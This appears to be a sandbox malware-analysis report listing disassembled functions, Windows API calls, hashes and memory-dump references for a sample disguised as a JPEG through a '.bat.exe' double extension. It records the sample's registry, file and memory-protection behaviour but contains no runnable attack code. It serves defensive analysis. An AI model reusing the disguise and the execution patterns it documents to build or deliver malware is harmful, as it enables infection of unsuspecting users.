Opcode ID: eba51940d4332acd4dd47c7e74c05a894e05f103e3ed4f03ff63104eadf75363
Instruction ID: b25d85e1bbcd4d244f4eb148e0c9713a17237d487539c162f8862d6a8c19e52d
Opcode Fuzzy Hash: eba51940d4332acd4dd47c7e74c05a894e05f103e3ed4f03ff63104eadf75363
Instruction Fuzzy Hash: C1517F72988215EFEB34BF67D850B5D3FB4EB0A71CF2DE426F50886210DB38A4419B65

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3be8b2c82b9d5296ba031bde5fc3ac6967fc1ef6e00b1cb2986e69e81292ed92
Instruction ID: 2eeecbca978bd34a3a2c87f0a48c5f542c226d41099ae67583a71d3d142e8862
Opcode Fuzzy Hash: 3be8b2c82b9d5296ba031bde5fc3ac6967fc1ef6e00b1cb2986e69e81292ed92
Instruction Fuzzy Hash: 80012831724210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D

Function 00402381 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004023A2
RegCloseKey.ADVAPI32(00000000), ref: 004023AB

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: e52abd4e0174ce3b76bb68f1c379d5c93953ff2c69c58b640d2bcd16652b4586
Instruction ID: b5e441b27b73f145435eebc05e6f2b3deee3722b7b5d1586dbbfb91a11b86f75
Opcode Fuzzy Hash: e52abd4e0174ce3b76bb68f1c379d5c93953ff2c69c58b640d2bcd16652b4586
Instruction Fuzzy Hash: A5F09C72B00111ABD711AFE49A8EABE76A49B40314F25453FF602B71C1D6FC5E02876E

Function 00401E2B Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E49
EnableWindow.USER32(00000000,00000000), ref: 00401E54

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: fb89bb2f38fe5b8984a52f5cfda2f345f39b2a72ed458b6a7c2d67b6650651d2
Instruction ID: 03bd5150381a8100516e4bd6b800a38f5b51aa9a4917fb4b876f9ca09f65a04e
Opcode Fuzzy Hash: fb89bb2f38fe5b8984a52f5cfda2f345f39b2a72ed458b6a7c2d67b6650651d2
Instruction Fuzzy Hash: 7FE092B2F08202AFDB14EBE5E9485EEB7B0DF40319B10403BE001F11D0DA7849419F59

Function 00406302 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403249,0000000A), ref: 00406314
GetProcAddress.KERNEL32(00000000,?), ref: 0040632F

Part of subcall function 00406294: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062AB
Part of subcall function 00406294: wsprintfA.USER32 ref: 004062E4
Part of subcall function 00406294: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F8

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 0d35e83e7827ddfc44332ff894d31571b8ba04ccc8674abf719cedda659f01fc
Instruction ID: 7792f7d89acf823de2699a2c6bb45250695d03a410eb934ddee53f05324a8379
Opcode Fuzzy Hash: 0d35e83e7827ddfc44332ff894d31571b8ba04ccc8674abf719cedda659f01fc
Instruction Fuzzy Hash: D2E08C32A08221ABD3106B74AD0493B73E8DB99740702487EFA06F2180D738EC2296A9

Function 00405B03 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe,80000000,00000003), ref: 00405B07
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B29

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
Instruction ID: 2f873e3f3c43f12a3908621a4267836d753c9203ad123c8b10a06e7f93ada197
Opcode Fuzzy Hash: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
Instruction Fuzzy Hash: C7D09E31658201EFEF098F20DD16F2EBBA2EB84B00F10962CB642944E0D6715815AB16

Function 004055D4 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,004031C9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 004055DA
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004055E8

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
Instruction ID: 176dbb695fa69d1773a7d690fb999828ada584b34c1629d79551d48c85d86b1a
Opcode Fuzzy Hash: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
Instruction Fuzzy Hash: E1C08C30608101BBD6000B318D09B073A56AB00340F1084356002E00F4C6309100C93F

Function 00405E1E Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B7C,00000000,?,?), ref: 00405E47

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c5562a190e42d8950a0f575b3a357be24d756bd6a7e1ac790deddfd4386432da
Instruction ID: 614deb5803ecfea412708c7c06f6093feae3e2eaa5d1670ea64157aa9e0e4aa4
Opcode Fuzzy Hash: c5562a190e42d8950a0f575b3a357be24d756bd6a7e1ac790deddfd4386432da
Instruction Fuzzy Hash: 1AE0ECB201454DBFEF095F90ED0ADBB371DEB14310F00492EFA16E40A0F6B5A920AA75

Function 00405B7B Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040318B,00000000,00000000,00402FE8,000000FF,00000004,00000000,00000000,00000000), ref: 00405B8F

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
Instruction ID: 82daff948be82a3a54a064a8b67bdb156262b24a8193569c828015c470817b44
Opcode Fuzzy Hash: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
Instruction Fuzzy Hash: AFE0EC3265425AABDF509E559C00BEB7BACEB453A0F008832F915E3190D235F9219BA5

Function 00405BAA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000020,?,00403159,00000000,0040A8C0,00000020,0040A8C0,00000020,000000FF,00000004,00000000), ref: 00405BBE

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
Instruction ID: 29870a228079f63f45527f16aa4763e95840d14b1a08b3071f6f7043dbe3ced8
Opcode Fuzzy Hash: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
Instruction Fuzzy Hash: EBE0EC3261429AABDF109F559C00EEB7B6CEB05361F144832FD15E6150E271F8219BB5

Function 6DDA28E5 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(6DDA404C,00000004,00000040,6DDA403C), ref: 6DDA2903

Memory Dump Source

Source File: 00000002.00000002.19336656011.000000006DDA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6DDA0000, based on PE: true

Associated: 00000002.00000002.19336624915.000000006DDA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.19336698506.000000006DDA3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.19336738516.000000006DDA5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6dda0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 178121d10c772b07a4abf6337ecaf8d20a9400d160935933870159fbf17a43e9
Instruction ID: 69f9bda1f8b421b5c42a52b2244b3564e51dcbbfe51a08cd1e4d61d974cc96f4
Opcode Fuzzy Hash: 178121d10c772b07a4abf6337ecaf8d20a9400d160935933870159fbf17a43e9
Instruction Fuzzy Hash: FFF0A5B15C82A1DEEB60FF69C46471A3FF0A31E354B1AC52AE15CD7241EB385048BB1D

Function 00402340 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402373

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 5b82fafcaaec8a5acc648c7dfa3e14f41738cacad1081e8147d88725ac003824
Instruction ID: 95cdf8392c9de35cfe821bde4bcbabdc9096ffea94e6ef07c2b1f4e495c6c526
Opcode Fuzzy Hash: 5b82fafcaaec8a5acc648c7dfa3e14f41738cacad1081e8147d88725ac003824
Instruction Fuzzy Hash: 3DE08630E04204BADB10AFA18E0AEAD3678AF41714F14883AF9507B0E1EAB944419B3D

Function 00405DF0 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405E7E,?,?,?,?,00000002,Call), ref: 00405E14

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
Instruction ID: ba5dad521a6b40c9e54b5391ff095803b52aec86cb211a8a265cc86c886d2883
Opcode Fuzzy Hash: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
Instruction Fuzzy Hash: 2AD0123214460DBBDF115F90EC05FAB371DFB14311F004426FE45A4091D375D670AB99

Function 00404055 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00010412,00000000,00000000,00000000), ref: 00404067

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
